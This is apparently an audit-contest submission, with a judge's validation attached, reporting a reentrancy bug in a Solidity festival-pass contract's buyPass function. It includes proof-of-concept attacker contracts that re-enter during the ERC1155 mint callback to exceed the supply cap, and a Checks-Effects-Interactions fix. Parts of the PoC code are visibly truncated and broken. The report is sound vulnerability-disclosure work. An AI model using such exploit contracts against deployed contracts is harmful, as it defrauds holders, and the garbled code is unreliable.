Beatland Festival

AI First Flight #4

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: medium

Valid

Reentrancy Vulnerability in Pass Purchase Allows Supply Cap Bypass

0xki

Root + Impact

Description

The buyPass() function in FestivalPass.sol is designed to mint festival passes to users upon payment, enforcing supply limits to prevent over-minting. Under normal operation, each purchase should increment the passSupply counter before any external interactions, ensuring the supply check accurately reflects all minted passes.
The function calls _mint() (an external interaction that triggers receiver hooks) before incrementing the passSupply counter, creating a reentrancy window. Contract wallets implementing onERC1155Received can re-enter buyPass() during the mint callback, and each reentrant call sees the unchanged supply counter, passing the require(passSupply[collectionId] < passMaxSupply[collectionId]) check despite multiple mints occurring.

function buyPass(uint256 collectionId) external payable {

require(collectionId == GENERAL_PASS || collectionId == VIP_PASS || collectionId == BACKSTAGE_PASS, "Invalid pass ID");

require(msg.value == passPrice[collectionId], "Incorrect payment amount");

@> require(passSupply[collectionId] < passMaxSupply[collectionId], "Max supply reached");

@> _mint(msg.sender, collectionId, 1, ""); // External call occurs here - can trigger reentrancy

@> ++passSupply[collectionId]; // State update happens AFTER external interaction

uint256 bonus = (collectionId == VIP_PASS) ? 5e18 : (collectionId == BACKSTAGE_PASS) ? 15e18 : 0;

if (bonus > 0) {

BeatToken(beatToken).mint(msg.sender, bonus);

}

emit PassPurchased(msg.sender, collectionId);

}

Risk

Likelihood:

The vulnerability activates when a user purchases passes using a contract wallet that implements reentrancy logic in its onERC1155Received hook, requiring technical sophistication but no coordination with other parties.
Exploitation becomes trivial for any attacker capable of deploying a malicious contract with receiver hook functionality, making this a realistic attack vector.

Impact:

Total minted passes can exceed maxSupply by factors determined only by gas limits and attacker resources, completely destroying supply scarcity mechanisms.
While attackers must pay for each mint, the supply cap bypass causes protocol-wide harm by inflating pass availability and reducing value for all holders.

Proof of Concept

contract ReentrancyAttacker {

FestivalPass public festivalPass;

uint256 public attackCount;

function attack() external payable {

festivalPass.buyPass{value: 0.01 ether}(1);

}

function onERC1155Received(

address,

uint256,

bytes calldata

) external returns (bytes4) {

attackCount++;

if (attackCount < 3) {

uint256 supply = festivalPass.passSupply(1);

uint256 maxSupply = festivalPass.passMaxSupply(1);

if (supply < maxSupply) {

festivalPass.buyPass{value: 0.01 ether}(1);

}

return this.onERC1155Received.selector;

}

function testExploit_M02_Reentrancy() public {

vm.startPrank(organizer);

festivalPass.configurePass(1, 0.01 ether, 3);

vm.stopPrank();

ReentrancyAttacker attacker = new ReentrancyAttacker{value: 1 ether}();

attacker.attack{value: 0.03 ether}();

assertTrue(festivalPass.balanceOf(address(attacker), 1) > 1);

}

Recommended Mitigation

Apply the Checks-Effects-Interactions pattern by updating state before external calls and moving event emissions appropriately.

function buyPass(uint256 collectionId) external payable {

require(collectionId == GENERAL_PASS || collectionId == VIP_PASS || collectionId == BACKSTAGE_PASS, "Invalid pass ID");

require(msg.value == passPrice[collectionId], "Incorrect payment amount");

require(passSupply[collectionId] < passMaxSupply[collectionId], "Max supply reached");

- _mint(msg.sender, collectionId, 1, "");

++passSupply[collectionId];

+ emit PassPurchased(msg.sender, collectionId);

+ _mint(msg.sender, collectionId, 1, "");

uint256 bonus = (collectionId == VIP_PASS) ? 5e18 : (collectionId == BACKSTAGE_PASS) ? 15e18 : 0;

if (bonus > 0) {

BeatToken(beatToken).mint(msg.sender, bonus);

}

- emit PassPurchased(msg.sender, collectionId);

}

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 20 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[M-02] Function `FestivalPass:buyPass` Lacks Defense Against Reentrancy Attacks, Leading to Exceeding the Maximum NFT Pass Supply

# Function `FestivalPass:buyPass` Lacks Defense Against Reentrancy Attacks, Leading to Exceeding the Maximum NFT Pass Supply ## Description * Under normal circumstances, the system should control the supply of tokens or resources to ensure that it does not exceed a predefined maximum limit. This helps maintain system stability, security, and predictable behavior. * The function `FestivalPass:buyPass` does not follow the **Checks-Effects-Interactions** pattern. If a user uses a malicious contract as their account and includes reentrancy logic, they can bypass the maximum supply limit. ```solidity function buyPass(uint256 collectionId) external payable { // Must be valid pass ID (1 or 2 or 3) require(collectionId == GENERAL_PASS || collectionId == VIP_PASS || collectionId == BACKSTAGE_PASS, "Invalid pass ID"); // Check payment and supply require(msg.value == passPrice[collectionId], "Incorrect payment amount"); require(passSupply[collectionId] < passMaxSupply[collectionId], "Max supply reached"); // Mint 1 pass to buyer @> _mint(msg.sender, collectionId, 1, ""); // question: potential reentrancy? ++passSupply[collectionId]; // VIP gets 5 BEAT welcome bonus, BACKSTAGE gets 15 BEAT welcome bonus uint256 bonus = (collectionId == VIP_PASS) ? 5e18 : (collectionId == BACKSTAGE_PASS) ? 15e18 : 0; if (bonus > 0) { // Mint BEAT tokens to buyer BeatToken(beatToken).mint(msg.sender, bonus); } emit PassPurchased(msg.sender, collectionId); } ``` ## Risk **Likelihood**: * If a user uses a contract wallet with reentrancy logic, they can trigger multiple malicious calls during the execution of the `_mint` function. **Impact**: * Although the attacker still pays for each purchase, the total number of minted NFTs will exceed the intended maximum supply. This can lead to supply inflation and user dissatisfaction. ## Proof of Concept ````Solidity //SPDX-License-Identifier: MIT pragma solidity 0.8.25; import "@openzeppelin/contracts/token/ERC1155/IERC1155Receiver.sol"; import "../src/FestivalPass.sol"; import "./FestivalPass.t.sol"; import {console} from "forge-std/Test.sol"; contract AttackBuyPass{ address immutable onlyOnwer; FestivalPassTest immutable festivalPassTest; FestivalPass immutable festivalPass; uint256 immutable collectionId; uint256 immutable configPassPrice; uint256 immutable configPassMaxSupply; uint256 hackMintCount = 0; constructor(FestivalPassTest _festivalPassTest, FestivalPass _festivalPass, uint256 _collectionId, uint256 _configPassPrice, uint256 _configPassMaxSupply) payable { onlyOnwer = msg.sender; festivalPassTest = _festivalPassTest; festivalPass = _festivalPass; collectionId = _collectionId; configPassPrice = _configPassPrice; configPassMaxSupply = _configPassMaxSupply; hackMintCount = 1; } receive() external payable {} fallback() external payable {} function DoAttackBuyPass() public { require(msg.sender == onlyOnwer, "AttackBuyPass: msg.sender != onlyOnwer"); // This attack can only bypass the "maximum supply" restriction. festivalPass.buyPass{value: configPassPrice}(collectionId); } function onERC1155Received( address operator, address from, uint256 id, uint256 value, bytes calldata data ) external returns (bytes4){ if (hackMintCount festivalPass.passMaxSupply(targetPassId)); } } ``` ```` ## Recommended Mitigation * Refactor the function `FestivalPass:buyPass` to follow the **Checks-Effects-Interactions** principle. ```diff function buyPass(uint256 collectionId) external payable { // Must be valid pass ID (1 or 2 or 3) require(collectionId == GENERAL_PASS || collectionId == VIP_PASS || collectionId == BACKSTAGE_PASS, "Invalid pass ID"); // Check payment and supply require(msg.value == passPrice[collectionId], "Incorrect payment amount"); require(passSupply[collectionId] < passMaxSupply[collectionId], "Max supply reached"); // Mint 1 pass to buyer - _mint(msg.sender, collectionId, 1, ""); ++passSupply[collectionId]; + emit PassPurchased(msg.sender, collectionId); + _mint(msg.sender, collectionId, 1, ""); // VIP gets 5 BEAT welcome bonus, BACKSTAGE gets 15 BEAT welcome bonus uint256 bonus = (collectionId == VIP_PASS) ? 5e18 : (collectionId == BACKSTAGE_PASS) ? 15e18 : 0; if (bonus > 0) { // Mint BEAT tokens to buyer BeatToken(beatToken).mint(msg.sender, bonus); } - emit PassPurchased(msg.sender, collectionId); } ```

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!